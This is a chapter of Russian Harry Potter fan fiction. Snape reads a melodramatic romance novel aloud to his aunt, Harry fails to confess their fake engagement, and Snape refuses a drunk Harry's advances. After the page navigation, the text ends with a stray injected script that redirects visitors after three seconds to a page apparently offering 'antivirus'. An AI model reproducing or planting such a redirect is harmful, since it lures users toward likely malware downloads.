– Должна ли я напомнить тебе тот факт, что сама научила тебя читать? Я провела множество вечеров, читая тебе против воли твоих глупых родителей. Каждый раз – ты был ещё маленьким – когда я приезжала, я читала тебе разные книги, даже учитывая то, что вкус у тебя был странный – ничего кроме магии и злых волшебников.

– Хватит, – остановил ее Северус и открыл книгу, просматривая главу. –  Хорошо, что я люблю тебя.

– Ха! Хорошо, что я люблю тебя.

Не меняя кислого выражения лица, Северус приступил к чтению.

– «Виктория смотрела на себя в высокое, во весь рост зеркало и восхищалась своим новым платьем  сапфирового цвета, точно под цвет  глаз – подарок отца».

– Отец купил её глаза? – легкомысленно перебил Гарри. – Просто ужасно.

Северус фыркнул.

«Любовалась она платьем  недолго – её отвлек неожиданный стук в дверь». Отвлек неожиданный стук? «Девушка наклонилась к окну, напоминая чем-то испуганного сапфирового какаду, скачущего на жердочке, и увидела мужчину в черном.  Густой  туман окутывал старый замок зловещими волнами этой темной звездной ясной ночью». Хм, так туманно или ясно? «Сердце Виктории зашлось в безумном ритме, словно стук молотка. Может, это вернулся её дядя, чтобы, наконец, покончить с ней?» Покончить с ней?  

– После того, как драгоценности семьи были спрятаны возле утесов, он уже пытался  столкнуть её со скал в главе три, – нетерпеливо пояснила Клара. – Дальше.

«Чувствуя, что времени на размышления нет, Виктория подобрала  юбки и сбежала вниз в поисках спасения. Она спускалась по лестнице к  задней  части замка, направляясь к утесам». Ну какой нормальный человек побежит к скалам, когда его преследуют?

– Северус!

– Я только хотел спросить, ведь по твоему собственному утверждению, она уже падала однажды со скалы в этой книге. «…Она могла слышать раздающиеся позади шаги, подбегая к скалам, окружающим замок Карлесстонов. Вся жизнь промелькнула перед глазами,  словно яркие цветные гудящие  пчелы времени.

– О, Виктория, не бойся! Это всего лишь я!

Виктория, споткнувшись, остановилась на  заросшей травой лужайке, и, повернувшись, оказалась в объятиях преследователя. Это не голос ее дяди – это Алекс! Её высокий герой выглядел так, будто по нему пробежался  разъяренный  бык. Виктории захотелось упасть в обморок». Я что,  единственный, кого не удивляет предрасположенность героини к обморокам?

– Продолжай читать, Северус.

«Он с загадочным видом осмотрелся вокруг, будто скрывая некую тайну.

О Алекс! – жалобно воскликнула Виктория. – О Алекс!

У него вырвался крик сочувствия при виде её страданий. Правда, чувствительные уши Виктории не услышали его, потому что стон этот он заключил в ловушку в глубине его души».

– Ладно! Для начала, – вскричал Гарри, – он  не очень-то хорошо скрывает свои тайны, раз она с одного взгляда может догадаться обо всем. И, во-вторых, автору просто необходим чертов словарь, чтобы поискать значение слов  вырваться и заключить в ловушку.

Гарри заработал удар тростью и упрек от Клары:

– Если не можешь слушать спокойно, просто выйди из комнаты.

Пристыженный и не желающий пропустить ни детали из восхитительной истории, в исполнении Северуса, Гарри плотно сжал губы.

– Так-то лучше. Северус, можешь продолжать.

Закатив глаза, тот продолжил:

«У него вырвался крик сочувствия при виде её страданий. Правда, чувствительные уши Виктории не услышали его, потому что стон этот он заключил в ловушку в глубине его души.

– О Виктория, любовь моя, так много разделяло нас все эти годы… Заговор  против короля, убийцы, нанятые твоим  дядей, который, оказался и  моим дядей также, брак и твоя амнезия, которую ты подхватила, упав со скалы…» Как можно подхватить амнезию? Это что, насморк? О Виктория! Боже,  разве обязательно каждый раз обращаясь к кому-нибудь добавлять «О!»?

– Северус! Мы можем обойтись и без твоих комментариев.

– Отлично. «О Виктория! Я люблю тебя! И ты теперь вся моя! И я никогда не позволю тебе исчезнуть снова!» Уверяю, что ударения не мои, кажется, этот автор слишком любит восклицательный знак.

– Северус!

– Ладно, ладно.  «Собственничество в его голосе было так глубоко и сильно, а  победные интонации рождали  потоки страстного восхищения так легко, как  нож проходит сквозь теплое масло. Викторию  словно облили холодной водой...»,  – Северус зыркнул на Гарри, который пялился на него с выражением фальшивой заинтересованности. Молодой человек наклонился вперед, подперев руками подбородок и прижимая пальцы к губам, чтобы подавить рвущийся наружу смех. Северус заскрипел зубами. – «Виктория  бросилась в объятия его сильных мускулистых рук. Ей хотелось обернуться вокруг него, как дерево обертывается вокруг горы…»  О Господи, вы не можете требовать, чтобы я читал этот бред!

– Северус!.. – угрожающе начала Клара.

Тот выдал мучительный стон и продолжил натянутым, монотонным голосом:

«Её хотелось обернуться вокруг него, как дерево обертывается вокруг горы, и прокатиться на нем, как на карусели… плоти». Он отчетливо услышал приглушенное, совсем неделикатно фырканье, исходящее от Гарри. Хммм, Поттер слишком уж наслаждается спектаклем. Должен же быть способ… – «Алекс притянул Викторию к себе. Почувствовав, что она дрожит,  спросил:

– Тебе ведь нравится?»

Гарри явно развлекался, что легко читалось на его лице, этакая восхитительная комбинация  подозрения и замешательства.

– «Алекс внимательно наблюдал за ней. Ей хотелось выглядеть искушенной, но это было не  так. Пока нет. И широко распахнутые глаза, и дрожащие губы подтверждали эту неопытность». 

Гарри  чуть не шлепнулся на пол. Именно то, о чем подумал он сам, когда  Северус дотрагивался до него утром. Он хотел казаться зрелым и опытным, несмотря на то, что был неуверен в себе и не знал, что делать. А он-то думал, что у него получилось. Очевидно, нет.

– «В этот момент Виктория начала издавать очень сексуальные звуки, мало чем отличающиеся от шипения змеи», – продолжил Северус, точно не зная, как далеко он может зайти, но наслаждаясь розовым оттенком щек Гарри. – «Влажный язык СС скользнул в рот...» Ах, да,  язык Виктории. «Алекс умолял ее продолжать, когда его назойливая тетя разрушила очарование момента». 

– Там нет ничего подобного! – взвилась Клара.

– Не думаешь ли ты, что я сочиняю? Вот тут, – Северус ткнул пальцем куда-то в страницу.

– Покажи мне, – попросила, а точнее, пролаяла Клара. 

Северус прижал книгу к груди:

– И что это даст? Похоже,  ты не можешь читать без очков, а? Или ты мне не веришь?  Как не веришь тому, что мне нужно закончить работу, поэтому я перестаю читать? 

– Ты не можешь бросить на середине главы, Северус. Только не это!

Снейп  улыбнулся, протягивая книгу Гарри:

– Уверен, Гарри доставит удовольствие закончить.

Под выжидающим взглядом Клары, Гарри открыл книгу и нашел нужное место. Слегка прокашлявшись, он прочел где-то около трех страниц, на которых Виктория целых два раза чуть не свалилась с утеса, прежде чем  подоспела развязка. В настоящий момент Алекс как раз растянулся на самом краю, пытаясь вытянуть любимую.

– «Откуда я знаю, что ты не бросишь меня? – визжала Виктория под свист ветра, хлеставшего, словно длинные языки морских водорослей, крутящихся у берега в прибое. (Мерлин, писанина просто ужасна!)

Я не похож на твоего дядю, Виктория, я никогда не обижу тебя. 

– Ах, как ты докажешь это?

Я люблю тебя, Виктория, – Алекс взял ее за руки. – И нет ничего драгоценнее любви. И правды. Правды любви».

Ужасно… но это чем-то задело Гарри. Если он хочет серьезных отношений с Северусом,  то... они начали их на весьма шатком основании. Ничего похожего на любовь и правду.

– Клара... – Гарри точно не знал, что сказать. И был абсолютно уверен, что Снейп будет в ярости, но ведь Клара заслужила правду? Они все заслужили. – Послушайте. Помните, Вы говорили на днях, что хотите видеть Северуса счастливым? Я тоже хотел бы этого,  но мне кажется,  у нас будет больше шансов достичь этого, если Вы… узнаете правду. Мы, Северус и я, были… не совсем честны с вами. Видите ли, мы не помолвлены.  Даже не встречаемся. Собственно говоря, это время самое продолжительное из тех, что мы находимся вместе и не пытаемся швырнуть проклятия друг в друга. Точнее, не  проклиная друг друга. Наши отношения, как бы лучше сказать… быстро воспламеняющиеся. Ему просто нужен был кто-то, притворяющийся его fiancé, пока Вы здесь. И он попросил меня... Я согласился… мы заключили договор… но на самом деле я хочу, чтобы Вы… ммм… знали: я действительно уважаю и восхищаюсь Вами, чувствуя себя  Вашим племянником. И думаю, что Сев мог бы стать для меня особенным. Особенным, – Гарри наконец сделал паузу, чтобы вдохнуть немного, и услышал лишь молчание,  прерываемое мягким раскатистым храпом.

Он оторвался от обложки книги, на которую таращился все это время, только для того, чтобы увидеть привалившуюся к спинке стула Клару. Её глаза были закрыты, а дыхание – глубоким и спокойным.

– Проклятье! – пробормотал Гарри, поднимаясь. Пожалуй, любви и правде придется подождать ещё немного.

Северус добрался до спальни ближе к одиннадцати вечера. Он не вышел к ужину, несмотря на все усилия тети (Гарри  был достаточно умен, чтобы даже не пытаться вытянуть его). Не то, чтобы он избегал Гарри или тетушку... А лишь потому,  что он слишком замкнутый человек. И, возможно, он все же избегает Гарри. Немного.

Но сейчас было поздно, и у него было время подумать, сделать выводы, отдохнув за книгой по зельям, а Гарри  все ещё нет в кровати... Первый раз в жизни он ждал  кого-то, кто побеспокоит его; надеялся, что Гарри поднимется по лестнице, ворвется к нему, взорвет благословенную тишину и только и будет делать, что доставлять проблемы, – это у него отлично получается.

Оставался всего один день по их договору – завтра уже Сочельник, а Гарри настаивал, что Рождество проведет с Уизли. Подходящее ли сейчас время,  чтобы поднять вопрос о дополнительных, более частых визитах Гарри, после окончания праздников? Визиты, не имеющие ни малейшего отношения к договору. После того, что сегодня произошло у магазина, можно было надеяться на что-то подобное... Не свидания, конечно! Северус не собирался встречаться с Гарри Поттером. Просто совместное времяпрепровождение, вот как сейчас. Конечно, первым делом, Гарри должен прояснить ситуацию с Джинни Уизли. Захочет ли Гарри сделать это ради него?

Северус вздохнул.

Мерлин, так противоестественно тихо, что он слышит свой вздох!

 

Именно в этот момент Северус понял, что пора действовать.

И даже не подозревал, что тетушка тоже времени даром не теряет.

Буквально.

 

– Северус!

Спускаясь по лестнице, он услышал ликующий крик Гарри. Что-то не так. Северус окинул комнату критическим взглядом.

Так, почти пустая бутылка его лучшего бренди на одной из книжных полок. Наполовину пустая чаша для пунша, с остатками смеси из взбитых яиц,  сахара, рома или вина, на столе, два бокала: один пустой перед Гарри и один перед Кларой, едва пригубленный.

– Северус! – вновь завопил Гарри, крутясь на диване вокруг себя, его глаза блестели. – Твоя тетя приготовила пунш.

– Настоящая сцена для семейного альбома, даже и не знаю – моя дорогая старая  тетушка, спаивающая моего fiancé.

– Я не пьян, – настаивал Гарри, шлепаясь на диван поближе к Северусу. – Клара сказала, что добавила туда не очень много спиртного.

– Ты совсем никакой, я понятия не имею, как ты ещё формулируешь предложения.

– А может, не я их формулирую, а они меня!

Северус закатил глаза:

– Потрясающе глубоко! Сколько бокалов ты выпил, Гарри?

– Один… или восемь. Полагаю, скорее ближе к восьми... 

Северус презрительно посмотрел на тетю:

– И что мне с этим делать? 

Гарри зафыркал, помахивая рукой у Северуса перед носом:

– А что нам  делать с тобой? Ты такая дубина!

– Дубина?

– В переносном смысле, – нетерпеливо пояснил Гарри.

Северус оглянулся на Клару:

– Думаешь, трезвым, он доставлял мало проблем? 

– Вряд ли можно всю ответственность за это возложить на меня, Северус. Гарри и я просто наслаждались традиционным рождественским напитком. Я, конечно, понятия не имела, что он  не сможет контролировать себя... А теперь я не против пойти поспать. – С помощью трости Клара поднялась и направилась к лестнице. – Спокойной ночи, Гарри, милый.

– Спокойной ночи, Клара. Из двух моих теть, Вы – самая любимая.  

– Спасибо, Гарри, очень приятно. Северус, полагаю, ты будешь обращаться с ним подобающе… в его состоянии. 

Поттер тем временем растянулся на диване и зарылся носом в подушки. 

– Вряд ли у меня есть выбор. 

– Сев-с, – попросил Гарри, не поднимая головы. – Тебе не кажется, что комната вертится? Похоже на падение с метлы.

Клара нахмурилась:

– Падение с метлы?

Северус пожал плечами, сжимая зубы:

– Он любит нести бред, когда выпьет.

– В таком случае, увидимся утром, – попрощалась Клара, исчезая на лестнице. Секунду спустя голова Гарри свесилась с дивана.

– Северус! – громко прошипел он.

– Гарри.

– Твоя тетя ушла, значит, ты можешь снова дотрагиваться до меня?

– Несмотря на тонкий план моей тетки, не имею никакого желания воспользоваться твоим состоянием.

– Подожди ... Я должен быть трезвым? – Гарри искренне удивился. – Но я не могу быть двумя людьми сразу. Смотри, я совсем трезв.

Странно, трезвый Гарри до ужаса походил на пьяного, с разницей лишь  в небольшое косоглазие.

– Но ты нетрезв.

Гарри захихикал, теряя косоглазие:

– Нет, определенно, нет!

– Знай я, что произойдет, запасся бы отрезвляющим зельем. Но не каждый день твоя шестидесятисемилетняя тетя начнет спаивать твоего fiancé.

– Моя голова вполне ясна!

– Видно, – хрюкнул Северус, обходя диван и усаживаясь на место, освобожденное Кларой.

– Дело не в ясности, а в тебе, – Гарри, пошатываясь, поднялся и подошел к Северусу. – Ты все, о чем я могу думать, – честно признался он шепотом, устраиваясь у Снейпа на коленях и утыкаясь тому куда-то в шею. А потом, тяжелый и теплый, потерся об его бедра. – Я не перестаю думать об этом.

– Гарри, что ты вытворяешь? – спросил Снейп, осторожно посматривая вниз.

– Почему ты  так делаешь?

– Как? 

– Смотришь как сноб. Будто все вокруг тебя низшие существа.

– Вот так? – протянул Северус с показной снисходительностью. Он сменил позу, вытягивая одно колено из-под тела Гарри и переплетая их ноги.

– Ты думаешь, что я низший? – пьяно спросил Гарри, елозя своим бедром о бедро Северуса.

– Да, – Северус скользнул ладонями под рубашку Гарри, ощущая гладкое, упругое тело. И почувствовал, как сбилось дыхание Гарри, когда его пальцы проникли под пояс джинсов, лаская нежную плоть.

– Как думаешь, что ты делаешь? – затаив дыхание, прошептал Гарри.

– Собираюсь показать, насколько ты ниже меня.

– И как именно ты собираешься это сделать?

Ядовитая улыбка появилась на губах Северуса:

– Я собираюсь поклоняться каждому дюйму твоего низшего тела. Ты хочешь этого?

– Я хоч-ч-чу тебя. 

– Правда?

Никого больше Только тебя. 

Северус одной рукой ласкал грудь Гарри, пропуская пальцы другой руки сквозь мягкие волосы, легко поглаживая и  поддерживая тяжелую голову. Гарри расслабленно вздыхал, упираясь затылком в теплую ладонь. Северус уже  потянулся к податливым, полураскрытым губам. Но не мог не задать последний, не дающий покоя вопрос:

Никого больше? А Джинни?

– А что Джинни? – переспросил Гарри, тяжело дыша и с трудом фокусируя взгляд на губах Северуса.

– Ты её любишь, помнишь об этом?

Смущенный вопросом, Гарри покачал головой, опуская её на грудь Снейпа:

– Ну, конечно, я её люблю. Она же моя  Джинни  – Руки Гарри нашли путь под рубашку Северуса, пока он как можно лучше пытался объяснить то, что чувствует, и с большим трудом продираясь сквозь затуманенные пуншем мысли. – Я хочу вас по-разному… Я хочу чувствовать тебя всего на мне и во мне. Потеряться в твоих прикосновениях. Позволь мне это хоть один раз.

Северус отвел подальше от себя  жадные руки Поттера, внезапно почувствовав себя грязным и используемым.

Гарри любит эту красивую, чистую, хорошую женщину. Гарри хочет любить ее, жениться на ней и иметь семью. И все же не испытывает отвращения  от пьяного тисканья с темным, непривлекательным и нелюдимым бывшим профессором.

Что-то изменилось в сознании Северуса после того, как он попал в совершенную, почти книжную ситуацию, которую надеялся контролировать. Он сам не понимал, почему стал мыслить по-другому.

Гарри, вероятно, думает, что оказывает милость ему,  позволяя запятнанным рукам ласкать золотистую кожу.

У Северуса было слишком много упрямой гордости, чтобы согласиться на это. Только не тогда, когда он хочет чего-то большего.

– Перестань. 

Мерцающие зеленые глаза удивленно прищурились. Гарри выглядел совершенно  расстроенным, а его пальцы продолжали скользить по рубашке Северуса:

– Перестать? Но… мы наконец-то одни. Причина в том, что я  выпил? Северус, все в порядке. Я понимаю, что делаю. Я хочу этого, клянусь! Даже понимая, что пьян, я все ещё… – раздалось пьяное хихиканье. – Знаешь, я вроде как забыл, что собирался…

Северус тряхнул головой и схватил Поттера за плечи,  вынуждая подняться. Как только шатающийся Гарри смог стоять самостоятельно, Снейп поднялся следом и потянул его за руку к лестнице.

– Тебе нужно лечь. Выглядишь так, будто в любой момент собираешься упасть, мальчик.  

Гарри в замешательстве отдернул руки и возмутился:

– Перестань меня копировать!

Северус окинул его долгим взглядом:

– Что значит копировать?

– Я знаю, что имел в виду!  А ты? 

– Кровать. Немедленно, – приказал Северус и потащил Гарри за руку к лестнице, не заботясь о том, что хватка намного сильнее, чем необходимо, и вероятно оставит синяки. Гарри внезапно остановился и выкрутился из захвата:

– Северус, смотри, – он открыл стоящий у двери мешок, вывалив содержимое на пол. Ветки омелы. Подобрав одну, Гарри поднял ее над головой: – Смотри, – и так вывернул голову, что можно было подумать, будто она у него резиновая, – мы под омелой. Значит, ты должен меня поцеловать, ну, или я тебя. Не знаю точно, кто кого должен целовать.

Северус устало покачал головой:

– В постель, Поттер.

– Ты уверен? – Гарри соблазнительно прикусил нижнюю губу. – На вкус я, наверно, похож на мускатный орех и сливки.

– И, несомненно, на бренди.

– Пожалуйста…

Игнорируя сбивчивые протесты, Северус отнял у Поттера ветку омелы и  позволил ей упасть на пол рядом с остальными. Потом потянул Гарри вверх по лестнице, к кровати – минус один поцелуй.

 

В конце концов,

наш герой никогда не отличался романтичностью.

И уж тем более не собирался начинать теперь.

Предыдущая глава   Оглавление   Следующая глава

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>